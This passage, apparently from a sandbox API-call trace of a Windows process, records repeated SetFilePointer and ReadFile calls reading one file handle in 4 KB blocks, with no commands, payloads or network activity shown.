lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2a000 [0081.099] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.099] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2b000 [0081.099] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.100] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2c000 [0081.100] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.100] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2d000 [0081.100] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.101] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2e000 [0081.101] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2f000 [0081.102] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x30000 [0081.103] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.104] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x31000 [0081.104] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.104] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x32000 [0081.104] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.105] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x33000 [0081.105] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.105] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x34000 [0081.105] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.106] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x35000 [0081.106] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.106] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x36000 [0081.106] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 
[0081.107] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x37000 [0081.107] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.107] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x38000 [0081.107] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x39000 [0081.108] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3a000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3b000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, 
lpOverlapped=0x0) returned 1 [0081.109] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3c000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.110] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3d000 [0081.110] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.110] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3e000 [0081.110] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.111] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3f000 [0081.111] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.111] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x40000 [0081.111] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x41000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x42000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x43000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x44000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x45000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | 
out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x46000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.116] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x47000 [0081.116] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.116] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x48000 [0081.117] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.118] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x49000 [0081.118] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.118] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4a000 [0081.118] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.119] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4b000 [0081.119] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.119] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4c000 [0081.119] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.120] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4d000 [0081.120] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.120] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4e000 [0081.120] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.121] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4f000 [0081.121] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.121] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x50000 [0081.121] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x51000 [0081.122] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x52000 [0081.123] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x53000 [0081.123] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x54000 [0081.124] ReadFile (in: 
hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.124] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x55000 [0081.124] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.125] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x56000 [0081.125] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.125] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x57000 [0081.125] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.126] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x58000 [0081.126] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x59000 
[0081.127] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5a000 [0081.127] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5b000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.128] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5c000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.128] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5d000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.129] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5e000 [0081.129] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.129] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5f000 [0081.129] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.130] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x60000 [0081.130] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.130] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x61000 [0081.130] ReadFile (in: 